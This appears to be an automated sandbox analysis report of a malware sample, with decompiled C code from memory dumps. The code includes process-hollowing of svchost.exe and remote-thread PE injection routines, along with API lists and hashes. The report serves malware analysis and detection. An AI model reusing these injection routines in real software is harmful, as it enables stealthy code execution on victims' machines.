                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0efe43ac9930b1a411e570d75614489bbb1537286d103692455dbefbee0a40ce
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23311BB1D00209EBCF04DF98C985FEEB7B5EF58304F108099E519B7281E739AA86CB50
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                                                                                                                                    			E00EC78D0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                    				char _v5;
                                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                    				intOrPtr _t31;
                                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v5 = 0;
                                                                                                                                                                                                                                                    				if(_a4 != 0 && _a8 > 0 && _a12 != 0 && _a16 >= _a8) {
                                                                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                                                                    					while(_v16 < _a8) {
                                                                                                                                                                                                                                                    						_t31 = E00EC7B70( &_v12, _v16 * 6 + _a4, 4);
                                                                                                                                                                                                                                                    						_push(_v12);
                                                                                                                                                                                                                                                    						L00ECB1EC();
                                                                                                                                                                                                                                                    						_v20 = _t31;
                                                                                                                                                                                                                                                    						wnsprintfA(_v16 * 0x28 + _a12, 0x28, "%s:%u", _v20,  *(_a4 + 4 + _v16 * 6) & 0x0000ffff);
                                                                                                                                                                                                                                                    						_t46 = _t46 + 0x20;
                                                                                                                                                                                                                                                    						_v16 = _v16 + 1;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_v5 = 1;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _v5;
                                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                                    0x00ec78d6
                                                                                                                                                                                                                                                    0x00ec78de
                                                                                                                                                                                                                                                    0x00ec78f8
                                                                                                                                                                                                                                                    0x00ec790a
                                                                                                                                                                                                                                                    0x00ec7922
                                                                                                                                                                                                                                                    0x00ec792d
                                                                                                                                                                                                                                                    0x00ec792e
                                                                                                                                                                                                                                                    0x00ec7933
                                                                                                                                                                                                                                                    0x00ec795a
                                                                                                                                                                                                                                                    0x00ec7960
                                                                                                                                                                                                                                                    0x00ec7907
                                                                                                                                                                                                                                                    0x00ec7907
                                                                                                                                                                                                                                                    0x00ec7965
                                                                                                                                                                                                                                                    0x00ec7965
                                                                                                                                                                                                                                                    0x00ec796f

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: inet_ntoawnsprintf
                                                                                                                                                                                                                                                    • String ID: %s:%u
                                                                                                                                                                                                                                                    • API String ID: 890441721-1474915593
                                                                                                                                                                                                                                                    • Opcode ID: 535416a2e8bfcbd5ec4d25ebb0532fd5c73ba8fb1f34a9b7919d54bd90b9421f
                                                                                                                                                                                                                                                    • Instruction ID: 7f3ccd62e6d2ee14d45615211baaa4b8749f87c67305638ed154abaa438b376d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 535416a2e8bfcbd5ec4d25ebb0532fd5c73ba8fb1f34a9b7919d54bd90b9421f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30118E71908208ABCB04CF94CA95FEDBBB4EB50308F04918DE955BA281D336E646CF51
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EC1E60(CHAR* _a4) {
                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                    				struct _PROCESS_INFORMATION _v24;
                                                                                                                                                                                                                                                    				struct _STARTUPINFOA _v100;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				if(_a4 != 0) {
                                                                                                                                                                                                                                                    					E00EC7D20(E00EC7D20( &_v24,  &_v24, 0, 0x10),  &_v100, 0, 0x44);
                                                                                                                                                                                                                                                    					_v100.cb = 0x44;
                                                                                                                                                                                                                                                    					if(CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0,  &_v100,  &_v24) != 0) {
                                                                                                                                                                                                                                                    						CloseHandle(_v24.hThread);
                                                                                                                                                                                                                                                    						_v8 = _v24.hProcess;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                    			}






                                                                                                                                                                                                                                                    0x00ec1e66
                                                                                                                                                                                                                                                    0x00ec1e71
                                                                                                                                                                                                                                                    0x00ec1e8b
                                                                                                                                                                                                                                                    0x00ec1e93
                                                                                                                                                                                                                                                    0x00ec1ebc
                                                                                                                                                                                                                                                    0x00ec1ec2
                                                                                                                                                                                                                                                    0x00ec1ecb
                                                                                                                                                                                                                                                    0x00ec1ecb
                                                                                                                                                                                                                                                    0x00ec1ebc
                                                                                                                                                                                                                                                    0x00ec1ed4

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00EC1EB4
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00EC1EC2
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                    • String ID: D
                                                                                                                                                                                                                                                    • API String ID: 3712363035-2746444292
                                                                                                                                                                                                                                                    • Opcode ID: 62e31282770ecbef7f47f21a68fa425c9154f19aab6de9c8fde9e716050985a7
                                                                                                                                                                                                                                                    • Instruction ID: 5ea4574ce48b12aafd18374541923ace5c88871d7fe9e091a46895765289620d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 62e31282770ecbef7f47f21a68fa425c9154f19aab6de9c8fde9e716050985a7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07011275A4420CABDB10DB90DD46FEE77B9AB04704F144158FA09BB281D7759E05CBA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                                                                                                                                    			E04001F80(intOrPtr _a4, signed char _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                    				char _v276;
                                                                                                                                                                                                                                                    				struct _CONTEXT _v996;
                                                                                                                                                                                                                                                    				struct _PROCESS_INFORMATION _v1012;
                                                                                                                                                                                                                                                    				intOrPtr _v1016;
                                                                                                                                                                                                                                                    				struct _STARTUPINFOA _v1092;
                                                                                                                                                                                                                                                    				intOrPtr _v1096;
                                                                                                                                                                                                                                                    				void _v1100;
                                                                                                                                                                                                                                                    				signed int _v1104;
                                                                                                                                                                                                                                                    				void* _t121;
                                                                                                                                                                                                                                                    				void* _t128;
                                                                                                                                                                                                                                                    				int _t130;
                                                                                                                                                                                                                                                    				void* _t132;
                                                                                                                                                                                                                                                    				int _t140;
                                                                                                                                                                                                                                                    				int _t143;
                                                                                                                                                                                                                                                    				int _t145;
                                                                                                                                                                                                                                                    				int _t148;
                                                                                                                                                                                                                                                    				void* _t180;
                                                                                                                                                                                                                                                    				void* _t263;
                                                                                                                                                                                                                                                    				void* _t265;
                                                                                                                                                                                                                                                    				void* _t266;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				if(_a4 == 0) {
                                                                                                                                                                                                                                                    					L26:
                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				GetEnvironmentVariableA("SystemRoot",  &_v276, 0x104);
                                                                                                                                                                                                                                                    				_t121 =  *0x400304c( &_v276, "\\system32\\svchost.exe");
                                                                                                                                                                                                                                                    				if(_a12 != 0) {
                                                                                                                                                                                                                                                    					 *0x400304c( &_v276, " ");
                                                                                                                                                                                                                                                    					_t121 =  *0x400304c( &_v276, _a12);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				E04001260(_t121,  &_v1012, 0, 0x10);
                                                                                                                                                                                                                                                    				E04001260( &_v1092,  &_v1092, 0, 0x44);
                                                                                                                                                                                                                                                    				_t265 = _t263 + 0x18;
                                                                                                                                                                                                                                                    				_v1092.cb = 0x44;
                                                                                                                                                                                                                                                    				_v1096 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
                                                                                                                                                                                                                                                    				_v1016 = _v1096 + ( *(_v1096 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                    				_v8 =  *((intOrPtr*)(_v1096 + 0x50));
                                                                                                                                                                                                                                                    				_t128 = VirtualAlloc(0, _v8, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                    				_v12 = _t128;
                                                                                                                                                                                                                                                    				if(_v12 != 0) {
                                                                                                                                                                                                                                                    					_t130 = CreateProcessA(0,  &_v276, 0, 0, 0, 4, 0, 0,  &_v1092,  &_v1012); // executed
                                                                                                                                                                                                                                                    					if(_t130 != 0) {
                                                                                                                                                                                                                                                    						_t132 = VirtualAllocEx(_v1012.hProcess,  *(_v1096 + 0x34), _v8, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                    						_v1100 = _t132;
                                                                                                                                                                                                                                                    						if(_v1100 != 0) {
                                                                                                                                                                                                                                                    							L10:
                                                                                                                                                                                                                                                    							E04001310(_v12, _a4,  *((intOrPtr*)(_v1096 + 0x54)));
                                                                                                                                                                                                                                                    							_t266 = _t265 + 0xc;
                                                                                                                                                                                                                                                    							_v1104 = 0;
                                                                                                                                                                                                                                                    							while(_v1104 < ( *(_v1096 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                    								if((_a8 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    									E04001310(_v12 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)), _a4 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)),  *((intOrPtr*)(_v1016 + 0x10 + _v1104 * 0x28)));
                                                                                                                                                                                                                                                    									_t266 = _t266 + 0xc;
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									E04001310(_v12 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)), _a4 +  *((intOrPtr*)(_v1016 + 0x14 + _v1104 * 0x28)),  *((intOrPtr*)(_v1016 + 0x10 + _v1104 * 0x28)));
                                                                                                                                                                                                                                                    									_t266 = _t266 + 0xc;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_v1104 = _v1104 + 1;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							E04001C00(_v12, _v1100);
                                                                                                                                                                                                                                                    							_t140 = WriteProcessMemory(_v1012.hProcess, _v1100, _v12, _v8, 0); // executed
                                                                                                                                                                                                                                                    							if(_t140 != 0) {
                                                                                                                                                                                                                                                    								VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                    								_v996.ContextFlags = 0x10007;
                                                                                                                                                                                                                                                    								_t143 = GetThreadContext(_v1012.hThread,  &_v996); // executed
                                                                                                                                                                                                                                                    								if(_t143 != 0) {
                                                                                                                                                                                                                                                    									_t145 = WriteProcessMemory(_v1012.hProcess, _v996.Ebx + 8,  &_v1100, 4, 0); // executed
                                                                                                                                                                                                                                                    									if(_t145 != 0) {
                                                                                                                                                                                                                                                    										_v996.Eax = _v1100 +  *((intOrPtr*)(_v1096 + 0x28));
                                                                                                                                                                                                                                                    										_t148 = SetThreadContext(_v1012.hThread,  &_v996); // executed
                                                                                                                                                                                                                                                    										if(_t148 == 0) {
                                                                                                                                                                                                                                                    											TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                    											CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                    											CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                    											goto L26;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    										ResumeThread(_v1012.hThread); // executed
                                                                                                                                                                                                                                                    										return _v1012.hProcess;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                    									CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                    									CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                    									return 0;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                    								CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                    								CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                    								return 0;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                    							CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                    							CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                    							VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                    							return 0;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t180 = VirtualAllocEx(_v1012.hProcess, 0, _v8, 0x103000, 0x40); // executed
                                                                                                                                                                                                                                                    						_v1100 = _t180;
                                                                                                                                                                                                                                                    						if(_v1100 != 0) {
                                                                                                                                                                                                                                                    							goto L10;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                    						CloseHandle(_v1012);
                                                                                                                                                                                                                                                    						CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                    						VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}

























                                                                                                                                                                                                                                                    0x04001f8d
                                                                                                                                                                                                                                                    0x040023d2
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x040023d2
                                                                                                                                                                                                                                                    0x04001fa4
                                                                                                                                                                                                                                                    0x04001fb6
                                                                                                                                                                                                                                                    0x04001fc0
                                                                                                                                                                                                                                                    0x04001fce
                                                                                                                                                                                                                                                    0x04001fdf
                                                                                                                                                                                                                                                    0x04001fdf
                                                                                                                                                                                                                                                    0x04001ff0
                                                                                                                                                                                                                                                    0x04002003
                                                                                                                                                                                                                                                    0x04002008
                                                                                                                                                                                                                                                    0x0400200b
                                                                                                                                                                                                                                                    0x0400201e
                                                                                                                                                                                                                                                    0x04002038
                                                                                                                                                                                                                                                    0x04002047
                                                                                                                                                                                                                                                    0x04002057
                                                                                                                                                                                                                                                    0x0400205d
                                                                                                                                                                                                                                                    0x04002064
                                                                                                                                                                                                                                                    0x04002090
                                                                                                                                                                                                                                                    0x04002098
                                                                                                                                                                                                                                                    0x040020ce
                                                                                                                                                                                                                                                    0x040020d4
                                                                                                                                                                                                                                                    0x040020e1
                                                                                                                                                                                                                                                    0x0400214d
                                                                                                                                                                                                                                                    0x0400215f
                                                                                                                                                                                                                                                    0x04002164
                                                                                                                                                                                                                                                    0x04002167
                                                                                                                                                                                                                                                    0x04002182
                                                                                                                                                                                                                                                    0x0400219e
                                                                                                                                                                                                                                                    0x0400222e
                                                                                                                                                                                                                                                    0x04002233
                                                                                                                                                                                                                                                    0x040021a0
                                                                                                                                                                                                                                                    0x040021e2
                                                                                                                                                                                                                                                    0x040021e7
                                                                                                                                                                                                                                                    0x040021e7
                                                                                                                                                                                                                                                    0x0400217c
                                                                                                                                                                                                                                                    0x0400217c
                                                                                                                                                                                                                                                    0x04002246
                                                                                                                                                                                                                                                    0x04002266
                                                                                                                                                                                                                                                    0x0400226e
                                                                                                                                                                                                                                                    0x040022bc
                                                                                                                                                                                                                                                    0x040022c2
                                                                                                                                                                                                                                                    0x040022da
                                                                                                                                                                                                                                                    0x040022e2
                                                                                                                                                                                                                                                    0x04002330
                                                                                                                                                                                                                                                    0x04002338
                                                                                                                                                                                                                                                    0x04002376
                                                                                                                                                                                                                                                    0x0400238a
                                                                                                                                                                                                                                                    0x04002392
                                                                                                                                                                                                                                                    0x040023b2
                                                                                                                                                                                                                                                    0x040023bf
                                                                                                                                                                                                                                                    0x040023cc
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x040023cc
                                                                                                                                                                                                                                                    0x0400239b
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x040023a1
                                                                                                                                                                                                                                                    0x04002343
                                                                                                                                                                                                                                                    0x04002350
                                                                                                                                                                                                                                                    0x0400235d
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04002363
                                                                                                                                                                                                                                                    0x040022ed
                                                                                                                                                                                                                                                    0x040022fa
                                                                                                                                                                                                                                                    0x04002307
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0400230d
                                                                                                                                                                                                                                                    0x04002279
                                                                                                                                                                                                                                                    0x04002286
                                                                                                                                                                                                                                                    0x04002293
                                                                                                                                                                                                                                                    0x040022a4
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x040022aa
                                                                                                                                                                                                                                                    0x040020f7
                                                                                                                                                                                                                                                    0x040020fd
                                                                                                                                                                                                                                                    0x0400210a
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04002115
                                                                                                                                                                                                                                                    0x04002122
                                                                                                                                                                                                                                                    0x0400212f
                                                                                                                                                                                                                                                    0x04002140
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04002146
                                                                                                                                                                                                                                                    0x040020a5
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04002066
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04002066

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 04001FA4
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,\system32\svchost.exe), ref: 04001FB6
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,0400317C), ref: 04001FCE
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 04001FDF
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 04002057
                                                                                                                                                                                                                                                    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 04002090
                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040020A5
                                                                                                                                                                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 040020CE
                                                                                                                                                                                                                                                    • VirtualAllocEx.KERNELBASE(?,00000000,?,00103000,00000040), ref: 040020F7
                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 04002115
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 04002122
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0400212F
                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04002140
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Virtual$Alloclstrcat$CloseFreeHandleProcess$CreateEnvironmentTerminateVariable
                                                                                                                                                                                                                                                    • String ID: D$SystemRoot$\system32\svchost.exe
                                                                                                                                                                                                                                                    • API String ID: 1819736980-1559310322
                                                                                                                                                                                                                                                    • Opcode ID: 036fed23e7ee821a2f18e3afc8e3bbde1b7bb66371f9036d2a87dc4e59fe086b
                                                                                                                                                                                                                                                    • Instruction ID: 1d4488b5fdb617a131862b70200c6806e4887f475a197b4823290bb3b9e97252
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 036fed23e7ee821a2f18e3afc8e3bbde1b7bb66371f9036d2a87dc4e59fe086b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07D13EB1A00215ABDB29CF54DC94FAEB7B9FB48704F0485D8F709A7280D678AE80CF55
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E04001DC0(void* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                                    				long _v12;
                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                    				long _v28;
                                                                                                                                                                                                                                                    				void* _v32;
                                                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                                                    				void* _t75;
                                                                                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                                                                                    				int _t85;
                                                                                                                                                                                                                                                    				void* _t90;
                                                                                                                                                                                                                                                    				void* _t138;
                                                                                                                                                                                                                                                    				void* _t139;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                    					L14:
                                                                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_v24 = _a8 +  *((intOrPtr*)(_a8 + 0x3c));
                                                                                                                                                                                                                                                    					_v20 = _v24 + ( *(_v24 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                    					_v12 =  *((intOrPtr*)(_v24 + 0x50));
                                                                                                                                                                                                                                                    					_t75 = VirtualAlloc(0, _v12, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                    					_v16 = _t75;
                                                                                                                                                                                                                                                    					if(_v16 != 0) {
                                                                                                                                                                                                                                                    						_t78 = VirtualAllocEx(_a4,  *(_v24 + 0x34), _v12, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                    						_v32 = _t78;
                                                                                                                                                                                                                                                    						if(_v32 != 0) {
                                                                                                                                                                                                                                                    							L7:
                                                                                                                                                                                                                                                    							E04001310(_v16, _a8,  *((intOrPtr*)(_v24 + 0x54)));
                                                                                                                                                                                                                                                    							_t139 = _t138 + 0xc;
                                                                                                                                                                                                                                                    							_v36 = 0;
                                                                                                                                                                                                                                                    							while(_v36 < ( *(_v24 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                    								E04001310(_v16 +  *((intOrPtr*)(_v20 + 0xc + _v36 * 0x28)), _a8 +  *((intOrPtr*)(_v20 + 0x14 + _v36 * 0x28)),  *((intOrPtr*)(_v20 + 0x10 + _v36 * 0x28)));
                                                                                                                                                                                                                                                    								_t139 = _t139 + 0xc;
                                                                                                                                                                                                                                                    								_v36 = _v36 + 1;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							E04001C00(_v16, _v32);
                                                                                                                                                                                                                                                    							_t85 = WriteProcessMemory(_a4, _v32, _v16, _v12, 0); // executed
                                                                                                                                                                                                                                                    							if(_t85 != 0) {
                                                                                                                                                                                                                                                    								VirtualFree(_v16, 0, 0x8000); // executed
                                                                                                                                                                                                                                                    								_v28 = 0;
                                                                                                                                                                                                                                                    								_t90 = CreateRemoteThread(_a4, 0, 0, _v32 +  *((intOrPtr*)(_v24 + 0x28)), 0x11, 0,  &_v28); // executed
                                                                                                                                                                                                                                                    								_v8 = _t90;
                                                                                                                                                                                                                                                    								goto L14;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                    							return 0;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_v32 = VirtualAllocEx(_a4, 0, _v12, 0x103000, 0x40);
                                                                                                                                                                                                                                                    						if(_v32 != 0) {
                                                                                                                                                                                                                                                    							goto L7;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}

















                                                                                                                                                                                                                                                    0x04001dc6
                                                                                                                                                                                                                                                    0x04001dd1
                                                                                                                                                                                                                                                    0x04001f72
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04001de1
                                                                                                                                                                                                                                                    0x04001dea
                                                                                                                                                                                                                                                    0x04001dfb
                                                                                                                                                                                                                                                    0x04001e04
                                                                                                                                                                                                                                                    0x04001e14
                                                                                                                                                                                                                                                    0x04001e1a
                                                                                                                                                                                                                                                    0x04001e21
                                                                                                                                                                                                                                                    0x04001e40
                                                                                                                                                                                                                                                    0x04001e46
                                                                                                                                                                                                                                                    0x04001e4d
                                                                                                                                                                                                                                                    0x04001e87
                                                                                                                                                                                                                                                    0x04001e96
                                                                                                                                                                                                                                                    0x04001e9b
                                                                                                                                                                                                                                                    0x04001e9e
                                                                                                                                                                                                                                                    0x04001eb0
                                                                                                                                                                                                                                                    0x04001eec
                                                                                                                                                                                                                                                    0x04001ef1
                                                                                                                                                                                                                                                    0x04001ead
                                                                                                                                                                                                                                                    0x04001ead
                                                                                                                                                                                                                                                    0x04001efe
                                                                                                                                                                                                                                                    0x04001f18
                                                                                                                                                                                                                                                    0x04001f20
                                                                                                                                                                                                                                                    0x04001f42
                                                                                                                                                                                                                                                    0x04001f48
                                                                                                                                                                                                                                                    0x04001f69
                                                                                                                                                                                                                                                    0x04001f6f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04001f6f
                                                                                                                                                                                                                                                    0x04001f2d
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04001f33
                                                                                                                                                                                                                                                    0x04001e66
                                                                                                                                                                                                                                                    0x04001e6d
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04001e7a
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04001e80
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04001e23

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 04001E14
                                                                                                                                                                                                                                                    • VirtualAllocEx.KERNELBASE(00000000,?,00000000,00003000,00000040), ref: 04001E40
                                                                                                                                                                                                                                                    • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00103000,00000040), ref: 04001E60
                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04001E7A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Virtual$Alloc$Free
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3668210933-0
